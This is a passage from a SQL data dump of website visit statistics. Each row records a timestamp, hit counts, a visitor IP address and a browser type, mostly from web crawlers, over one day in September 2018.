84','other'),(307845,1537889901,1,1,0,0,'178.154.244.29','other'),(307846,1537889972,1,0,1,0,'66.249.64.131',''),(307847,1537890128,1,1,0,0,'54.36.149.100','other'),(307848,1537890155,1,1,0,0,'54.36.148.205','other'),(307849,1537890287,1,1,0,0,'54.36.148.215','other'),(307850,1537890386,1,1,0,0,'54.36.149.52','other'),(307851,1537890438,1,1,0,0,'54.36.148.90','other'),(307852,1537890521,1,1,0,0,'54.36.149.98','other'),(307853,1537890920,1,1,0,0,'54.36.148.214','other'),(307854,1537891352,1,1,0,0,'54.36.148.42','other'),(307855,1537891416,1,1,0,0,'54.36.148.32','other'),(307856,1537891442,1,1,0,0,'54.36.148.117','other'),(307857,1537891556,1,1,0,0,'46.200.62.240','chrome'),(307858,1537891653,1,0,1,0,'66.249.64.131',''),(307859,1537891861,1,1,0,0,'54.36.148.55','other'),(307860,1537891900,1,1,0,0,'54.36.148.126','other'),(307861,1537892158,2,2,0,0,'54.36.148.201','other'),(307862,1537892421,1,1,0,0,'35.202.99.105','other'),(307863,1537892455,1,1,0,0,'54.36.149.74','other'),(307864,1537892517,1,1,0,0,'54.36.148.115','other'),(307865,1537892557,1,1,0,0,'54.36.149.27','other'),(307866,1537892683,1,1,0,0,'54.36.148.207','other'),(307867,1537892877,1,1,0,0,'54.36.148.187','other'),(307868,1537893063,1,1,0,0,'54.36.148.89','other'),(307869,1537893206,1,1,0,0,'54.36.149.56','other'),(307870,1537893239,1,1,0,0,'54.36.149.58','other'),(307871,1537893269,1,1,0,0,'54.36.148.92','other'),(307872,1537893332,1,1,0,0,'54.36.148.111','other'),(307873,1537893379,1,1,0,0,'54.36.149.5','other'),(307874,1537893435,1,1,0,0,'54.36.148.110','other'),(307875,1537893666,1,0,1,0,'66.249.64.135',''),(307876,1537893674,1,1,0,0,'54.36.148.227','other'),(307877,1537893701,1,1,0,0,'54.36.149.104','other'),(307878,1537893727,1,1,0,0,'54.36.148.221','other'),(307879,1537893963,1,1,0,0,'54.36.148.247','other'),(307880,1537893998,1,1,0,0,'54.36.148.64','other'),(307881,1537894031,1,1,0,0,'95.163.255.171','other'),(307882,1537894167,1,1,0,0,'91.196.178.189','chrome'),(307883,1537894191,1,1,0,0,'54.36.148.54','other'),(307884,1537894314,1,1,0,0,'8.29.198.27','other'),(307885,1537894493,1,1,0,0,'8.29.198.25','other'),(307886,1537894529,1,1,0,0,'54.36.148.235','other'),(307887,1537894886,2,2,0,0,'54.36.148.212','other'),(307888,1537894929,1,1,0,0,'54.36.148.70','other'),(307889,1537894934,1,1,0,0,'54.36.148.26','other'),(307890,1537895020,1,1,0,0,'54.36.148.221','other'),(307891,1537895156,1,1,0,0,'91.196.178.189','chrome'),(307892,1537895171,1,1,0,0,'54.36.148.41','other'),(307893,1537895203,1,1,0,0,'54.36.148.107','other'),(307894,1537895247,1,1,0,0,'54.36.148.230','other'),(307895,1537895355,1,1,0,0,'54.36.148.231','other'),(307896,1537895508,1,1,0,0,'54.36.148.236','other'),(307897,1537895778,1,1,0,0,'92.113.189.235','chrome'),(307898,1537895793,1,1,0,0,'95.163.255.181','other'),(307899,1537896186,1,1,0,0,'54.36.148.176','other'),(307900,1537896266,1,1,0,0,'54.36.148.157','other'),(307901,1537896268,1,1,0,0,'54.36.149.42','other'),(307902,1537896643,1,1,0,0,'54.36.148.220','other'),(307903,1537897040,1,1,0,0,'54.36.148.82','other'),(307904,1537897059,1,1,0,0,'216.244.66.241','other'),(307905,1537897354,1,1,0,0,'54.36.148.182','other'),(307906,1537897523,1,1,0,0,'54.36.148.55','other'),(307907,1537897887,1,1,0,0,'54.36.148.251','other'),(307908,1537897900,1,1,0,0,'54.36.148.163','other'),(307909,1537897922,2,2,0,0,'178.154.244.29','other'),(307910,1537897925,4,4,0,0,'178.154.244.11','other'),(307911,1537897973,1,1,0,0,'141.8.142.103','other'),(307912,1537898011,1,1,0,0,'54.36.148.76','other'),(307913,1537898145,1,1,0,0,'54.36.148.176','other'),(307914,1537898479,2,2,0,0,'5.45.207.79','other'),(307915,1537898597,1,1,0,0,'54.36.149.53','other'),(307916,1537898615,1,1,0,0,'54.36.148.220','other'),(307917,1537898816,1,1,0,0,'54.36.148.233','other'),(307918,1537898818,1,1,0,0,'8.29.198.25','other'),(307919,1537898875,1,1,0,0,'54.36.148.150','other'),(307920,1537899061,1,1,0,0,'54.36.149.85','other'),(307921,1537899422,1,1,0,0,'54.36.148.131','other'),(307922,1537899612,1,1,0,0,'216.244.66.241','other'),(307923,1537899749,1,1,0,0,'54.165.59.7','other'),(307924,1537899906,1,0,1,0,'66.249.64.135',''),(307925,1537899951,1,1,0,0,'54.36.148.163','other'),(307926,1537900152,1,1,0,0,'92.113.189.235','chrome'),(307927,1537900187,1,1,0,0,'178.154.244.11','other'),(307928,1537900199,1,1,0,0,'54.36.148.185','other'),(307929,1537900225,1,1,0,0,'54.36.149.77','other'),(307930,1537900666,1,1,0,0,'54.36.148.151','other'),(307931,1537900888,1,1,0,0,'54.36.149.21','other'),(307932,1537901177,1,1,0,0,'54.36.149.78','other'),(307933,1537901268,1,1,0,0,'54.36.148.199','other'),(307934,1537901532,1,1,0,0,'66.249.64.131','chrome'),(307935,1537901641,1,1,0,0,'54.36.148.150','other'),(307936,1537902259,1,1,0,0,'54.36.148.138','other'),(307937,1537902412,1,1,0,0,'54.36.148.238','other'),(307938,1537902519,2,0,2,0,'66.249.64.131',''),(307939,1537902574,1,1,0,0,'178.154.244.29','other'),(307940,1537902584,1,1,0,0,'54.36.149.50','other'),(307941,1537902729,2,2,0,0,'93.73.173.105','chrome'),(307942,1537902837,1,1,0,0,'54.36.148.154','other'),(307943,1537903188,1,1,0,0,'54.36.148.50','other'),(307944,1537903304,1,1,0,0,'80.252.153.33','firefox'),(307945,1537903339,1,1,0,0,'54.36.148.206','other'),(307946,1537903409,1,1,0,0,'54.36.148.233','other'),(307947,1537903473,1,1,0,0,'54.36.149.19','other'),(307948,1537903575,1,1,0,0,'54.36.149.71','other'),(307949,1537903984,1,1,0,0,'54.36.148.54','other'),(307950,1537904055,1,1,0,0,'216.244.66.241','other'),(307951,1537904183,1,1,0,0,'54.36.148.185','other'),(307952,1537904345,1,1,0,0,'54.36.149.32','other'),(307953,1537904409,1,1,0,0,'54.36.149.83','other'),(307954,1537904430,1,1,0,0,'54.36.148.225','other'),(307955,1537904474,1,1,0,0,'54.36.148.139','other'),(307956,1537904489,1,1,0,0,'54.36.149.3','other'),(307957,1537904500,1,1,0,0,'54.36.149.85','other'),(307958,1537904623,1,1,0,0,'54.36.148.140','other'),(307959,1537904753,1,0,1,0,'66.249.64.137',''),(307960,1537904779,1,1,0,0,'178.154.244.11','other'),(307961,1537904961,1,1,0,0,'178.154.244.29','other'),(307962,1537904983,1,1,0,0,'54.36.148.223','other'),(307963,1537904998,1,1,0,0,'66.249.64.135','chrome'),(307964,1537905140,1,1,0,0,'54.36.148.122','other'),(307965,1537905144,1,1,0,0,'8.29.198.27','other'),(307966,1537905327,1,1,0,0,'8.29.198.25','other'),(307967,1537905382,1,1,0,0,'54.36.148.211','other'),(307968,1537905431,1,1,0,0,'54.36.148.152','other'),(307969,1537905466,1,1,0,0,'54.36.148.137','other'),(307970,1537905647,1,1,0,0,'54.36.148.239','other'),(307971,1537905894,1,1,0,0,'180.76.15.25','other'),(307972,1537906023,1,1,0,0,'54.36.148.166','other'),(307973,1537906097,10,10,0,0,'178.154.244.11','other'),(307974,1537906303,14,14,0,0,'178.154.244.29','other'),(307975,1537906398,1,1,0,0,'54.36.148.74','other'),(307976,1537906606,1,1,0,0,'216.244.66.241','other'),(307977,1537906614,3,3,0,0,'5.45.207.79','other'),(307978,1537906632,1,1,0,0,'54.36.149.69','other'),(307979,1537906641,1,1,0,0,'54.36.148.181','other'),(307980,1537906775,1,0,1,0,'66.249.70.27',''),(307981,1537906859,1,1,0,0,'54.36.149.92','other'),(307982,1537906959,2,2,0,0,'95.108.213.4','other'),(307983,1537906964,2,2,0,0,'5.45.207.19','other'),(307984,1537907031,1,1,0,0,'141.8.142.103','other'),(307985,1537907032,2,2,0,0,'178.154.244.11','other'),(307986,1537907475,1,1,0,0,'54.36.148.36','other'),(307987,1537907477,1,1,0,0,'185.220.101.10','chrome'),(307988,1537907763,2,0,2,0,'66.249.64.135',''),(307989,1537907798,1,1,0,0,'54.36.148.14','other'),(307990,1537907811,1,1,0,0,'54.36.149.13','other'),(307991,1537907827,1,1,0,0,'54.36.148.228','other'),(307992,1537907952,1,1,0,0,'54.36.148.182','other'),(307993,1537908276,2,0,2,0,'66.249.64.131',''),(307994,1537908454,1,1,0,0,'54.36.148.13','other'),(307995,1537908578,1,1,0,0,'54.36.148.132','other'),(307996,1537908723,1,1,0,0,'54.36.148.164','other'),(307997,1537908859,1,1,0,0,'54.36.149.32','other'),(307998,1537909026,1,1,0,0,'54.36.148.221','other'),(307999,1537909202,1,1,0,0,'207.46.13.164','other'),(308000,1537909226,1,1,0,0,'54.36.148.154','other'),(308001,1537909285,2,2,0,0,'216.244.66.241','other'),(308002,1537909377,1,1,0,0,'54.36.148.110','other'),(308003,1537909529,1,1,0,0,'54.36.148.21','other'),(308004,1537909654,1,1,0,0,'8.29.198.27','other'),(308005,1537909894,1,1,0,0,'54.36.148.182','other'),(308006,1537909925,1,1,0,0,'66.249.64.131','chrome'),(308007,1537910213,1,1,0,0,'54.36.148.84','other'),(308008,1537910260,1,1,0,0,'54.36.149.100','other'),(308009,1537910973,1,1,0,0,'54.36.149.41','other'),(308010,1537911137,1,1,0,0,'54.36.149.34','other'),(308011,1537911290,1,1,0,0,'54.36.148.253','other'),(308012,1537911535,1,1,0,0,'216.244.66.241','other'),(308013,1537911585,1,1,0,0,'54.36.148.33','other'),(308014,1537911627,1,1,0,0,'54.36.149.4','other'),(308015,1537911679,1,1,0,0,'54.36.149.23','other'),(308016,1537911788,1,1,0,0,'54.36.148.245','other'),(308017,1537911844,1,1,0,0,'54.36.148.137','other'),(308018,1537912233,1,1,0,0,'54.36.149.49','other'),(308019,1537912492,1,1,0,0,'54.36.148.72','other'),(308020,1537912575,1,1,0,0,'54.36.149.96','other'),(308021,1537912782,1,1,0,0,'54.36.148.185','other'),(308022,1537913570,1,1,0,0,'54.36.149.53','other'),(308023,1537914010,1,1,0,0,'54.36.148.138','other'),(308024,1537914196,1,1,0,0,'54.36.148.88','other'),(308025,1537914550,1,1,0,0,'54.36.148.218','other'),(308026,1537915010,1,1,0,0,'54.36.148.102','other'),(308027,1537915067,1,1,0,0,'54.36.149.55','other'),(308028,1537915425,1,1,0,0,'66.249.64.137','chrome'),(308029,1537915592,1,1,0,0,'54.36.148.88','other'),(308030,1537915651,1,1,0,0,'54.36.149.36','other'),(308031,1537915724,1,1,0,0,'54.36.148.12','other'),(308032,1537915978,1,1,0,0,'8.29.198.27','other'),(308033,1537916043,1,1,0,0,'54.36.148.13','other'),(308034,1537916163,1,1,0,0,'8.29.198.26','other'),(308035,1537916521,1,1,0,0,'54.36.149.21','other'),(308036,1537916532,1,1,0,0,'54.36.148.21','other'),(308037,1537916566,1,1,0,0,'54.36.148.32','other'),(308038,1537916938,1,1,0,0,'54.36.149.73','other'),(308039,1537917512,1,1,0,0,'54.36.149.84','other'),(308040,1537917583,1,1,0,0,'54.36.149.21','other'),(308041,1537917809,1,1,0,0,'54.36.149.102','other'),(308042,1537918055,1,1,0,0,'54.36.148.114','other'),(308043,1537918105,1,1,0,0,'54.36.148.202','other'),(308044,1537918201,1,1,0,0,'54.36.148.72','other'),(308045,1537918205,1,1,0,0,'91.209.11.236','other'),(308046,1537918252,1,1,0,0,'54.36.148.120','other'),(308047,1537918594,1,1,0,0,'54.36.149.20','other'),(308048,1537918846,1,1,0,0,'54.36.148.205','other'),(308049,1537919045,1,1,0,0,'54.36.149.97','other'),(308050,1537919139,1,1,0,0,'66.249.64.135','chrome'),(308051,1537919265,1,1,0,0,'95.163.255.191','other'),(308052,1537919508,1,1,0,0,'54.36.148.192','other'),(308053,1537919557,1,1,0,0,'54.36.148.10','other'),(308054,1537919732,1,1,0,0,'54.36.148.207','other'),(308055,1537920490,1,1,0,0,'8.29.198.27','other'),(308056,1537920494,1,1,0,0,'54.36.148.16','other'),(308057,1537920577,1,1,0,0,'54.36.148.164','other'),(308058,1537920652,1,1,0,0,'54.36.148.161','other'),(308059,1537920765,1,1,0,0,'66.249.64.131','chrome'),(308060,1537920875,1,1,0,0,'54.36.148.26','other'),(308061,1537921343,1,1,0,0,'54.36.148.250','other'),(308062,1537921812,2,2,0,0,'216.244.66.241','other'),(308063,1537921892,1,1,0,0,'54.36.148.197','other'),(308064,1537922038,1,1,0,0,'178.154.244.29','other'),(308065,1537922099,1,1,0,0,'54.36.149.47','other'),(308066,1537922116,1,1,0,0,'54.36.148.193','other'),(308067,1537922229,1,1,0,0,'54.36.149.98','other'),(308068,1537922564,1,1,0,0,'207.46.13.164','other'),(308069,1537922792,1,1,0,0,'54.36.148.170','other'),(308070,1537923057,1,1,0,0,'54.36.148.105','other'),(308071,1537923583,1,1,0,0,'54.36.148.168','other'),(308072,1537923591,1,1,0,0,'54.70.130.97','chrome'),(308073,1537924035,1,1,0,0,'54.36.149.71','other'),(308074,1537924342,2,1,1,0,'66.249.70.27',''),(308075,1537924533,1,1,0,0,'54.36.149.93','other'),(308076,1537924625,1,1,0,0,'54.36.149.70','other'),(308077,1537924663,1,1,0,0,'54.36.148.113','other'),(308078,1537925335,1,1,0,0,'54.36.148.62','other'),(308079,1537925361,1,1,0,0,'54.36.149.36','other'),(308080,1537925751,1,1,0,0,'204.12.226.26','other'),(308081,1537926346,1,1,0,0,'54.36.148.173','other'),(308082,1537926804,2,2,0,0,'8.29.198.26','other'),(308083,1537927157,1,1,0,0,'54.36.148.26','other'),(308084,1537927596,1,1,0,0,'54.36.148.78','other'),(308085,1537927765,1,1,0,0,'54.36.148.132','other'),(308086,1537928147,1,1,0,0,'54.36.149.26','other'),(308087,1537928562,1,1,0,0,'54.36.149.68','other'),(308088,1537928569,3,3,0,0,'178.154.244.11','other'),(308089,1537928615,1,1,0,0,'178.154.244.29','other'),(308090,1537928800,1,1,0,0,'54.36.148.34','other'),(308091,1537929420,1,1,0,0,'54.36.149.48','other'),(308092,1537929587,1,1,0,0,'54.36.148.234','other'),(308093,1537930296,1,1,0,0,'54.36.148.78','other'),(308094,1537930468,1,1,0,0,'54.36.148.107','other'),(308095,1537930553,1,1,0,0,'54.36.148.239','other'),(308096,1537931323,1,1,0,0,'8.29.198.25','other'),(308097,1537931351,1,1,0,0,'54.36.148.24','other'),(308098,1537931520,1,1,0,0,'54.36.148.159','other'),(308099,1537931529,1,1,0,0,'54.36.149.61','other'),(308100,1537931620,1,1,0,0,'54.36.148.42','other'),(308101,1537931634,1,1,0,0,'54.36.148.112','other'),(308102,1537931763,1,1,0,0,'54.36.148.190','other'),(308103,1537931775,1,1,0,0,'54.36.148.151','other'),(308104,1537931792,1,1,0,0,'54.36.149.48','other'),(308105,1537931933,1,1,0,0,'54.36.148.235','other'),(308106,1537932303,2,2,0,0,'178.154.244.11','other'),(308107,1537932341,1,1,0,0,'54.36.149.41','other'),(308108,1537932379,2,2,0,0,'178.154.244.29','other'),(308109,1537932477,1,1,0,0,'54.36.149.13','other'),(308110,1537932520,1,1,0,0,'54.165.59.7','other'),(308111,1537932630,1,1,0,0,'87.250.224.47','other'),(308112,1537932751,1,1,0,0,'35.162.70.167','chrome'),(308113,1537932762,1,1,0,0,'54.36.149.22','other'),(308114,1537932766,1,1,0,0,'66.249.64.131','chrome'),(308115,1537932890,1,1,0,0,'54.36.149.40','other'),(308116,1537933272,1,1,0,0,'54.36.149.95','other'),(308117,1537933680,1,1,0,0,'180.76.15.26','other'),(308118,1537933966,1,1,0,0,'54.36.149.48','other'),(308119,1537933974,2,2,0,0,'216.244.66.241','other'),(308120,1537934097,1,1,0,0,'54.36.148.128','other'),(308121,1537934542,1,1,0,0,'37.54.114.62','chrome'),(308122,1537934551,1,1,0,0,'54.36.149.0','other'),(308123,1537934648,1,1,0,0,'54.36.148.11','other'),(308124,1537934874,1,1,0,0,'54.36.149.26','other'),(308125,1537934896,1,1,0,0,'54.36.148.199','other'),(308126,1537934924,1,1,0,0,'178.154.244.29','other'),(308127,1537935184,1,1,0,0,'54.36.149.33','other'),(308128,1537935305,1,1,0,0,'54.36.148.47','other'),(308129,1537935755,1,1,0,0,'54.36.148.154','other'),(308130,1537936677,1,1,0,0,'54.36.148.41','other'),(308131,1537937371,1,1,0,0,'54.36.149.48','other'),(308132,1537937521,1,1,0,0,'54.36.148.53','other'),(308133,1537937540,1,1,0,0,'54.36.148.145','other'),(308134,1537937611,1,1,0,0,'54.36.148.165','other'),(308135,1537937625,1,1,0,0,'8.29.198.25','other'),(308136,1537937685,1,1,0,0,'54.36.148.27','other'),(308137,1537937729,1,1,0,0,'54.36.148.167','other'),(308138,1537937838,1,1,0,0,'8.29.198.26','other'),(308139,1537937980,1,1,0,0,'54.36.149.91','other'),(308140,1537937985,1,1,0,0,'95.163.255.181','other'),(308141,1537938165,1,1,0,0,'54.36.148.101','other'),(308142,1537938199,1,1,0,0,'54.36.148.40','other'),(308143,1537938493,1,1,0,0,'54.36.149.13','other'),(308144,1537938502,1,1,0,0,'54.36.148.252','other'),(308145,1537938581,2,2,0,0,'54.36.148.30','other'),(308146,1537938716,1,1,0,0,'40.77.167.168','other'),(308147,1537938718,1,1,0,0,'54.36.149.10','other'),(308148,1537938725,5,5,0,0,'178.154.244.29','other'),(308149,1537938728,2,2,0,0,'178.154.244.11','other'),(308150,1537938983,1,1,0,0,'54.36.149.59','other'),(308151,1537939110,1,1,0,0,'95.163.255.195','other'),(308152,1537939119,1,1,0,0,'54.36.148.59','other'),(308153,1537939462,1,1,0,0,'54.36.148.89','other'),(308154,1537939666,1,1,0,0,'54.36.148.21','other'),(308155,1537939777,1,1,0,0,'54.36.148.228','other'),(308156,1537940037,1,1,0,0,'54.36.148.131','other'),(308157,1537940098,1,1,0,0,'54.36.149.38','other'),(308158,1537940183,1,1,0,0,'91.196.178.79','chrome'),(308159,1537940321,1,1,0,0,'216.244.66.241','other'),(308160,1537940348,1,1,0,0,'54.36.149.97','other'),(308161,1537940581,1,1,0,0,'54.36.149.61','other'),(308162,1537940638,1,1,0,0,'51.255.65.46','other'),(308163,1537940893,1,1,0,0,'130.180.218.86','chrome'),(308164,1537941090,1,1,0,0,'91.196.179.138','chrome'),(308165,1537941189,1,1,0,0,'54.36.149.68','other'),(308166,1537941893,1,1,0,0,'66.249.64.137','chrome'),(308167,1537942118,1,1,0,0,'54.36.148.120','other'),(308168,1537942147,4,4,0,0,'175.44.18.235','chrome'),(308169,1537942150,1,1,0,0,'216.244.66.241','other'),(308170,1537942158,1,1,0,0,'54.36.148.140','other'),(308171,1537942164,1,1,0,0,'8.29.198.25','other'),(308172,1537942289,1,1,0,0,'54.36.148.247','other'),(308173,1537942818,1,1,0,0,'37.52.191.199','chrome'),(308174,1537942898,1,1,0,0,'54.36.148.159','other'),(308175,1537943267,1,1,0,0,'54.36.148.81','other'),(308176,1537943428,1,1,0,0,'54.36.148.199','other'),(308177,1537943489,1,1,0,0,'54.36.148.219','other'),(308178,1537943738,1,1,0,0,'54.36.148.206','other'),(308179,1537943948,1,1,0,0,'54.36.149.105','other'),(308180,1537944387,1,1,0,0,'216.244.66.241','other'),(308181,1537944482,1,1,0,0,'95.163.255.161','other'),(308182,1537944496,1,1,0,0,'54.36.148.128','other'),(308183,1537944587,1,1,0,0,'54.36.148.191','other'),(308184,1537944638,1,1,0,0,'54.36.148.84','other'),(308185,1537944753,1,1,0,0,'54.36.148.94','other'),(308186,1537944763,1,1,0,0,'54.36.149.7','other'),(308187,1537944837,1,1,0,0,'54.36.149.73','other'),(308188,1537944996,1,1,0,0,'54.36.149.46','other'),(308189,1537945030,1,1,0,0,'54.36.148.122','other'),(308190,1537945218,1,1,0,0,'54.36.148.52','other'),(308191,1537945285,1,1,0,0,'54.36.149.67','other'),(308192,1537945364,1,1,0,0,'54.36.149.45','other'),(308193,1537945419,1,1,0,0,'54.36.148.208','other'),(308194,1537945482,1,1,0,0,'216.244.66.241','other'),(308195,1537945580,1,1,0,0,'95.163.255.151','other'),(308196,1537945839,1,1,0,0,'54.36.149.18','other'),(308197,1537945840,1,1,0,0,'54.36.148.139','other'),(308198,1537946027,1,1,0,0,'54.36.149.32','other'),(308199,1537946258,1,1,0,0,'54.36.148.12','other'),(308200,1537946290,1,1,0,0,'54.36.148.46','other'),(308201,1537946344,1,1,0,0,'195.230.119.59','chrome'),(308202,1537946480,1,1,0,0,'216.244.66.241','other'),(308203,1537946522,1,1,0,0,'54.36.149.70','other'),(308204,1537946535,1,1,0,0,'54.36.148.174','other'),(308205,1537946730,1,1,0,0,'40.77.167.170','other'),(308206,1537946896,1,1,0,0,'54.36.149.50','other'),(308207,1537947058,1,1,0,0,'54.36.148.109','other'),(308208,1537947243,1,1,0,0,'54.36.149.10','other'),(308209,1537947526,1,1,0,0,'54.36.148.62','other'),(308210,1537947528,1,1,0,0,'54.36.148.165','other'),(308211,1537947585,1,1,0,0,'54.36.149.6','other'),(308212,1537947697,1,1,0,0,'54.36.148.194','other'),(308213,1537947779,1,1,0,0,'54.36.148.211','other'),(308214,1537947927,1,1,0,0,'54.36.148.230','other'),(308215,1537948142,1,1,0,0,'91.209.11.236','other'),(308216,1537948389,1,1,0,0,'54.36.148.92','other'),(308217,1537948422,1,1,0,0,'91.196.178.86','chrome'),(308218,1537948461,1,1,0,0,'8.29.198.27','other'),(308219,1537948658,1,1,0,0,'62.205.134.182','msie'),(308220,1537948669,1,1,0,0,'8.29.198.26','other'),(308221,1537948929,1,1,0,0,'54.36.148.199','other'),(308222,1537948937,1,1,0,0,'54.36.149.22','other'),(308223,1537949045,2,2,0,0,'91.209.11.236','other'),(308224,1537949376,1,1,0,0,'54.36.148.23','other'),(308225,1537949389,1,1,0,0,'54.36.149.10','other'),(308226,1537949476,1,1,0,0,'66.249.64.137','chrome'),(308227,1537949585,1,1,0,0,'91.196.178.69','firefox'),(308228,1537949620,1,1,0,0,'54.36.148.76','other'),(308229,1537949826,1,1,0,0,'46.219.204.121','chrome'),(308230,1537949842,1,1,0,0,'54.36.148.83','other'),(308231,1537950003,1,1,0,0,'54.36.149.92','other'),(308232,1537950419,1,1,0,0,'54.36.148.45','other'),(308233,1537950523,2,2,0,0,'95.216.38.186','other'),(308234,1537950556,2,2,0,0,'91.196.178.188','chrome'),(308235,1537950650,1,1,0,0,'54.36.148.60','other'),(308236,1537950757,1,1,0,0,'216.244.66.241','other'),(308237,1537951196,1,1,0,0,'91.209.11.236','other'),(308238,1537951276,1,1,0,0,'178.154.244.11','other'),(308239,1537951331,1,1,0,0,'54.36.149.21','other'),(308240,1537951502,1,1,0,0,'54.36.148.30','other'),(308241,1537951559,1,1,0,0,'54.36.148.157','other'),(308242,1537951569,1,1,0,0,'54.36.148.153','other'),(308243,1537951599,1,1,0,0,'54.36.148.95','other'),(308244,1537951601,1,1,0,0,'39.104.106.233','other'),(308245,1537951685,1,1,0,0,'54.36.148.122','other'),(308246,1537952017,1,1,0,0,'54.36.149.14','other'),(308247,1537952075,1,1,0,0,'54.36.149.95','other'),(308248,1537952366,1,1,0,0,'54.36.149.41','other'),(308249,1537952375,1,1,0,0,'54.36.149.11','other'),(308250,1537952648,1,1,0,0,'91.209.11.236','other'),(308251,1537952684,1,1,0,0,'54.36.148.16','other'),(308252,1537953001,1,1,0,0,'8.29.198.27','other'),(308253,1537953030,1,1,0,0,'54.36.148.101','other'),(308254,1537953792,1,1,0,0,'54.36.148.205','other'),(308255,1537953875,1,1,0,0,'54.36.148.181','other'),(308256,1537954079,1,1,0,0,'54.36.149.75','other'),(308257,1537954244,1,1,0,0,'54.36.148.214','other'),(308258,1537954246,1,1,0,0,'207.46.13.190','other'),(308259,1537954257,1,1,0,0,'54.36.149.68','other'),(308260,1537954318,1,1,0,0,'193.19.187.192','chrome'),(308261,1537954324,1,1,0,0,'178.154.244.29','other'),(308262,1537954510,1,0,1,0,'66.249.70.27',''),(308263,1537954755,1,1,0,0,'54.36.148.237','other'),(308264,1537954951,1,1,0,0,'66.249.64.131','chrome'),(308265,1537955153,1,1,0,0,'80.252.154.233','firefox'),(308266,1537955219,1,1,0,0,'54.36.148.136','other'),(308267,1537955333,1,1,0,0,'54.36.149.10','other'),(308268,1537955402,1,1,0,0,'54.36.148.91','other'),(308269,1537955521,1,1,0,0,'194.44.222.252','chrome'),(308270,1537955810,1,1,0,0,'91.196.177.134','chrome'),(308271,1537955890,1,1,0,0,'54.36.148.60','other'),(308272,1537956106,1,1,0,0,'54.36.148.52','other'),(308273,1537956117,1,1,0,0,'91.196.178.69','firefox'),(308274,1537956174,1,1,0,0,'54.36.149.3','other'),(308275,1537956206,1,1,0,0,'54.36.149.27','other'),(308276,1537956328,2,2,0,0,'37.115.92.200','chrome'),(308277,1537956410,1,1,0,0,'54.36.149.38','other'),(308278,1537956758,1,1,0,0,'54.36.149.97','other'),(308279,1537956762,7,7,0,0,'178.154.244.29','other'),(308280,1537956795,1,1,0,0,'54.36.148.14','other'),(308281,1537956809,1,0,1,0,'66.249.64.131',''),(308282,1537956907,1,1,0,0,'192.151.145.82','other'),(308283,1537957194,1,1,0,0,'54.36.149.83','other'),(308284,1537957493,1,1,0,0,'54.36.149.42','other'),(308285,1537957494,1,1,0,0,'54.36.149.8','other'),(308286,1537957604,1,1,0,0,'37.115.92.200','chrome'),(308287,1537957672,1,1,0,0,'54.36.148.67','other'),(308288,1537957890,1,1,0,0,'66.249.70.29','chrome'),(308289,1537957997,1,1,0,0,'54.36.148.164','other'),(308290,1537958184,1,1,0,0,'54.36.148.71','other'),(308291,1537958337,1,1,0,0,'54.36.148.59','other'),(308292,1537958479,1,1,0,0,'54.36.148.50','other'),(308293,1537958564,1,1,0,0,'54.36.149.65','other'),(308294,1537958631,9,9,0,0,'178.154.244.29','other'),(308295,1537958744,1,1,0,0,'54.36.148.132','other'),(308296,1537958761,6,6,0,0,'178.154.244.11','other'),(308297,1537958796,4,4,0,0,'5.45.207.79','other'),(308298,1537958827,1,1,0,0,'54.36.148.21','other'),(308299,1537958954,1,1,0,0,'54.36.149.77','other'),(308300,1537959073,1,1,0,0,'54.36.149.8','other'),(308301,1537959074,1,1,0,0,'87.250.224.65','other'),(308302,1537959088,1,1,0,0,'91.124.16.148','chrome'),(308303,1537959111,1,1,0,0,'54.36.148.39','other'),(308304,1537959115,1,1,0,0,'54.36.149.33','other'),(308305,1537959160,1,1,0,0,'54.36.148.183','other'),(308306,1537959231,1,1,0,0,'54.36.148.224','other'),(308307,1537959246,1,1,0,0,'5.45.207.19','other'),(308308,1537959290,1,1,0,0,'8.29.198.27','other'),(308309,1537959524,1,1,0,0,'8.29.198.25','other'),(308310,1537959530,2,2,0,0,'37.9.113.103','other'),(308311,1537959546,9,9,0,0,'178.154.244.29','other'),(308312,1537959654,1,1,0,0,'54.36.148.136','other'),(308313,1537959899,1,1,0,0,'54.36.149.90','other'),(308314,1537959938,6,6,0,0,'178.154.244.11','other'),(308315,1537959941,4,4,0,0,'5.45.207.79','other'),(308316,1537960112,1,1,0,0,'141.8.142.103','other'),(308317,1537960286,1,1,0,0,'40.77.167.170','other'),(308318,1537960392,1,1,0,0,'180.76.15.139','other'),(308319,1537960407,1,1,0,0,'54.36.148.147','other'),(308320,1537960482,1,1,0,0,'54.36.148.179','other'),(308321,1537960503,1,1,0,0,'87.250.224.65','other'),(308322,1537960547,11,11,0,0,'178.154.244.29','other'),(308323,1537960575,1,1,0,0,'54.36.149.91','other'),(308324,1537960771,1,1,0,0,'54.36.149.77','other'),(308325,1537960870,1,1,0,0,'54.36.149.12','other'),(308326,1537960928,5,5,0,0,'178.154.244.11','other'),(308327,1537961039,1,1,0,0,'54.36.148.84','other'),(308328,1537961053,3,3,0,0,'5.45.207.79','other'),(308329,1537961060,1,1,0,0,'188.163.18.219','chrome'),(308330,1537961130,1,1,0,0,'37.115.92.200','chrome'),(308331,1537961256,1,1,0,0,'66.249.64.137','chrome'),(308332,1537961364,1,1,0,0,'54.36.149.97','other'),(308333,1537961379,1,1,0,0,'5.45.207.19','other'),(308334,1537961476,1,1,0,0,'54.36.148.24','other'),(308335,1537961521,1,1,0,0,'54.36.148.90','other'),(308336,1537961782,1,1,0,0,'54.36.148.58','other'),(308337,1537963173,1,1,0,0,'54.36.148.125','other'),(308338,1537963174,1,1,0,0,'91.196.178.179','chrome'),(308339,1537963308,1,1,0,0,'66.249.64.137','chrome'),(308340,1537963364,1,1,0,0,'54.36.148.167','other'),(308341,1537963387,1,1,0,0,'157.55.39.131','other'),(308342,1537963590,1,1,0,0,'54.36.149.65','other'),(308343,1537963634,1,1,0,0,'54.36.148.72','other'),(308344,1537963770,3,3,0,0,'5.9.107.211','other'),(308345,1537963793,1,1,0,0,'91.196.178.102','chrome'),(308346,1537963835,1,1,0,0,'8.29.198.26','other'),(308347,1537963991,1,1,0,0,'54.36.149.89','other'),(308348,1537964114,1,1,0,0,'54.36.148.96','other'),(308349,1537964873,1,1,0,0,'54.36.148.173','other'),(308350,1537964994,1,1,0,0,'146.185.157.242','chrome'),(308351,1537965386,1,1,0,0,'54.36.148.160','other'),(308352,1537966082,1,1,0,0,'95.163.255.190','other'),(308353,1537966226,1,1,0,0,'54.36.148.220','other'),(308354,1537966230,1,1,0,0,'54.36.148.23','other'),(308355,1537966477,1,1,0,0,'54.36.148.206','other'),(308356,1537966951,2,2,0,0,'54.36.148.42','other'),(308357,1537966999,1,1,0,0,'54.36.149.79','other'),(308358,1537967046,1,1,0,0,'54.36.148.192','other'),(308359,1537